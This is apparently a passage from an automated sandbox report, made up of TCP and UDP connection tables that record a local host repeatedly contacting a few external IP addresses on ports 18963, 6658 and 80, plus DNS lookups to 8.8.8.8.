Feb 17, 2022 20:23:13.883939028 CET	49784	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:14.539293051 CET	49779	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:23:16.351938009 CET	49782	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:16.555085897 CET	49783	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:17.055119991 CET	49784	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:17.401120901 CET	49785	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:17.531799078 CET	49786	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:17.647183895 CET	49787	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:20.539802074 CET	49779	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:23:20.555504084 CET	49785	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:20.556371927 CET	49786	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:20.742925882 CET	49787	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:21.433780909 CET	49789	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:21.550321102 CET	49790	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:21.614084959 CET	49791	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:24.555761099 CET	49789	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:24.558166027 CET	49790	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:24.743321896 CET	49791	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:25.465820074 CET	49792	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:25.579066992 CET	49793	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:25.709443092 CET	49794	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:28.478003979 CET	49792	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:28.587354898 CET	49793	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:28.712347984 CET	49794	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:29.511503935 CET	49795	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:29.625524044 CET	49796	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:29.902740002 CET	49797	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:32.525197983 CET	49795	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:32.634592056 CET	49796	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:32.993959904 CET	49797	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:33.043796062 CET	49798	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:23:33.683917999 CET	49799	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:33.819241047 CET	49800	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:33.942368031 CET	49801	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:36.056772947 CET	49798	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:23:36.697422981 CET	49799	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:36.994314909 CET	49801	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:36.994333982 CET	49800	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:37.684039116 CET	49802	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:38.016088963 CET	49807	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:38.068542004 CET	49808	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:40.697730064 CET	49802	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:41.072796106 CET	49808	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:41.197796106 CET	49807	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:41.903321981 CET	49811	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:41.948524952 CET	49812	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:41.965219021 CET	49813	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:42.072838068 CET	49798	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:23:45.073120117 CET	49811	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:45.075928926 CET	49812	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:45.075931072 CET	49813	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:45.909537077 CET	49814	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:46.020782948 CET	49816	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:46.098843098 CET	49817	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:49.073503017 CET	49814	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:49.076312065 CET	49816	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:49.261017084 CET	49817	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:50.329184055 CET	49818	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:51.272985935 CET	49819	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:51.469491959 CET	49820	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:53.370778084 CET	49818	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:54.188404083 CET	49821	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:23:54.357566118 CET	49822	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:54.480392933 CET	49824	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:54.570969105 CET	49825	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:57.199174881 CET	49821	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:23:57.370992899 CET	49822	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:57.550731897 CET	49824	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:57.699208975 CET	49825	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:23:58.373507977 CET	49826	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:58.679655075 CET	49827	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:23:58.731421947 CET	49828	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:01.386133909 CET	49826	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:01.699575901 CET	49827	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:01.902728081 CET	49828	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:02.421534061 CET	49829	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:02.668710947 CET	49830	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:02.742820978 CET	49831	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:03.199654102 CET	49821	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:24:05.590480089 CET	49829	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:05.699891090 CET	49830	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:05.847337961 CET	49831	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:06.436528921 CET	49841	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:07.264720917 CET	49844	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:07.704483986 CET	49845	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:09.575186968 CET	49841	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:10.372126102 CET	49844	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:10.457274914 CET	49852	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:10.741727114 CET	49853	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:11.102328062 CET	49855	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:13.575498104 CET	49852	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:13.763091087 CET	49853	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:14.263128996 CET	49855	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:14.516737938 CET	49864	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:14.814464092 CET	49865	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:15.181761026 CET	49866	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:15.381655931 CET	49867	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:24:17.591502905 CET	49864	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:17.904047012 CET	49865	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:18.200900078 CET	49866	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:18.372850895 CET	49867	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:24:18.549974918 CET	49871	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:18.666249990 CET	49872	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:18.711308002 CET	49873	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:21.591855049 CET	49871	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:21.763696909 CET	49873	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:21.763703108 CET	49872	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:22.562903881 CET	49874	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:22.967469931 CET	49875	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:23.344778061 CET	49876	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:24.373366117 CET	49867	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:24:25.576571941 CET	49874	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:26.076587915 CET	49875	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:26.373442888 CET	49876	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:26.613848925 CET	49877	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:26.990613937 CET	49878	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:27.030289888 CET	49879	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:29.764374018 CET	49877	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:30.076895952 CET	49879	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:30.077142954 CET	49878	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:30.626754045 CET	49880	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:30.911830902 CET	49881	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:31.275247097 CET	49882	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:33.764740944 CET	49880	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:34.077255011 CET	49881	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:34.264800072 CET	49882	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:34.674209118 CET	49884	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:35.002455950 CET	49885	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:35.052783966 CET	49886	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:36.489506006 CET	49887	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:24:37.780664921 CET	49884	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:38.077548981 CET	49885	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:38.077568054 CET	49886	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:38.660480022 CET	49888	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:38.776281118 CET	49889	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:38.851147890 CET	49890	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:39.499593973 CET	49887	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:24:41.656023026 CET	49888	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:41.765378952 CET	49889	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:41.859126091 CET	49890	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:42.800327063 CET	49891	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:43.464385033 CET	49892	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:43.622086048 CET	49893	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:45.640724897 CET	49887	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:24:45.828238964 CET	49891	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:46.625217915 CET	49893	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:46.625247955 CET	49892	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:47.735678911 CET	49894	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:47.785954952 CET	49895	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:48.176073074 CET	49896	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:50.826800108 CET	49894	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:50.826812983 CET	49895	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:51.232749939 CET	49896	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:51.744332075 CET	49898	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:51.887243032 CET	49900	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:52.067465067 CET	49901	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:54.930258989 CET	49898	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:54.930273056 CET	49900	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:55.140283108 CET	49901	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:55.746957064 CET	49907	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:55.863857985 CET	49908	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:56.214493990 CET	49909	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:58.031186104 CET	49910	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:24:58.774265051 CET	49907	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:58.977416039 CET	49908	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:24:59.274315119 CET	49909	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:24:59.807918072 CET	49911	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:00.117471933 CET	49912	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:00.678340912 CET	49913	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:01.040067911 CET	49910	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:25:02.977703094 CET	49911	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:03.165194035 CET	49912	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:03.774616957 CET	49913	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:03.829505920 CET	49915	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:03.942967892 CET	49916	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:04.011285067 CET	49917	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:06.993666887 CET	49915	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:06.993685961 CET	49916	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:07.040534973 CET	49910	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:25:07.165548086 CET	49917	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:07.875799894 CET	49918	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:07.972696066 CET	49919	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:08.044715881 CET	49920	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:10.978391886 CET	49918	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:10.978413105 CET	49919	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:11.165925980 CET	49920	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:11.919881105 CET	49921	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:12.036312103 CET	49922	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:12.341052055 CET	49923	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:14.978683949 CET	49921	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:15.166222095 CET	49922	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:15.478790045 CET	49923	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:15.950455904 CET	49924	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:16.071641922 CET	49925	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:16.160984993 CET	49926	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:18.979072094 CET	49924	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:19.088430882 CET	49925	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:19.291598082 CET	49926	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:20.591011047 CET	49927	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:20.592607975 CET	49928	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:25:20.669766903 CET	49929	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:20.722137928 CET	49930	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:23.666922092 CET	49927	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:23.745054960 CET	49928	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:25:23.776281118 CET	49930	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:23.776300907 CET	49929	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:24.607819080 CET	49931	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:24.727201939 CET	49932	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:24.796541929 CET	49933	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:27.667239904 CET	49931	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:27.776635885 CET	49932	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:27.979801893 CET	49933	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:28.638705015 CET	49934	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:28.754245996 CET	49935	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:29.015666962 CET	49936	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:29.745541096 CET	49928	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:25:31.667618990 CET	49934	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:31.776989937 CET	49935	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:32.042663097 CET	49936	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:32.702909946 CET	49937	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:32.852785110 CET	49938	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:33.015381098 CET	49939	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:35.746114016 CET	49937	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:35.933563948 CET	49938	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:36.042979956 CET	49939	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:36.749684095 CET	49940	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:36.881827116 CET	49941	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:36.923110008 CET	49942	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:39.840225935 CET	49940	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:40.043349028 CET	49942	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:40.046036005 CET	49941	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:40.766527891 CET	49943	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:40.883513927 CET	49944	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:41.254756927 CET	49945	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:41.953624964 CET	49946	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:25:43.922868013 CET	49944	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:43.922916889 CET	49943	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:44.340583086 CET	49945	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:44.848783970 CET	49947	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:44.965606928 CET	49946	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:25:44.997997999 CET	49948	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:45.089612007 CET	49949	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:47.856458902 CET	49947	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:48.012763023 CET	49948	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:48.090863943 CET	49949	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:48.858859062 CET	49950	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:48.977242947 CET	49951	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:49.064718962 CET	49952	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:50.981703997 CET	49946	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:25:51.872447968 CET	49950	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:51.981802940 CET	49951	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:52.091197014 CET	49952	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:52.927772999 CET	49953	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:53.054955959 CET	49954	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:53.089385986 CET	49955	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:56.107233047 CET	49955	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:56.107268095 CET	49953	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:56.107312918 CET	49954	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:56.969527006 CET	49956	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:57.325937033 CET	49957	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:25:57.374577999 CET	49958	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:25:59.982522011 CET	49956	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:00.326272011 CET	49957	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:00.388794899 CET	49958	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:00.976614952 CET	49959	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:01.087939978 CET	49960	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:01.161637068 CET	49961	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:03.112797976 CET	49962	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:26:03.982810020 CET	49959	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:04.092202902 CET	49960	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:04.170336962 CET	49961	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:04.986397028 CET	49963	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:05.108376980 CET	49964	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:05.163552999 CET	49965	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:06.123689890 CET	49962	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:26:07.998776913 CET	49963	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:08.123786926 CET	49964	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:08.170721054 CET	49965	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:09.019865036 CET	49967	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:09.133142948 CET	49968	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:09.500267982 CET	49969	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:12.030407906 CET	49967	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:12.124108076 CET	49962	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:26:12.139751911 CET	49968	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:12.514843941 CET	49969	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:13.017371893 CET	49970	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:13.132905006 CET	49971	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:13.491718054 CET	49972	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:16.030719042 CET	49970	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:16.140110970 CET	49971	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:16.499480963 CET	49972	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:17.069417953 CET	49973	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:17.225172997 CET	49974	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:17.240720987 CET	49975	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:20.077919006 CET	49973	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:20.234180927 CET	49974	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:20.249789953 CET	49975	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:21.079823017 CET	49976	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:21.197877884 CET	49977	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:21.549209118 CET	49978	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:24.093892097 CET	49976	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:24.203301907 CET	49977	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:24.562726974 CET	49978	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:24.925029039 CET	49979	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:26:25.111954927 CET	49980	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:25.294596910 CET	49981	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:25.336426973 CET	49982	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:27.937920094 CET	49979	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:26:28.266117096 CET	49980	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:28.453622103 CET	49981	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:28.454545975 CET	49982	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:29.113867044 CET	49983	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:29.230367899 CET	49984	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:29.771018982 CET	49985	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:32.125777960 CET	49983	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:32.235177040 CET	49984	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:32.782140970 CET	49985	80	192.168.2.5	123.126.45.92
Feb 17, 2022 20:26:33.938463926 CET	49979	6658	192.168.2.5	107.163.56.251
Feb 17, 2022 20:26:38.251336098 CET	49984	18963	192.168.2.5	107.163.56.232
Feb 17, 2022 20:26:38.313864946 CET	49983	18963	192.168.2.5	107.163.56.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 17, 2022 20:22:56.503609896 CET	59596	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:22:56.820297003 CET	53	59596	8.8.8.8	192.168.2.5
Feb 17, 2022 20:22:57.484842062 CET	65296	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:22:57.803123951 CET	53	65296	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:01.320740938 CET	63183	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:01.640818119 CET	53	63183	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:05.332601070 CET	60151	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:05.654016018 CET	53	60151	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:09.397387981 CET	56969	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:09.416057110 CET	53	56969	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:13.562412977 CET	54757	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:13.881606102 CET	53	54757	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:17.551609993 CET	49992	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:17.568496943 CET	53	49992	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:21.592600107 CET	55016	53	192.168.2.5	8.8.8.8
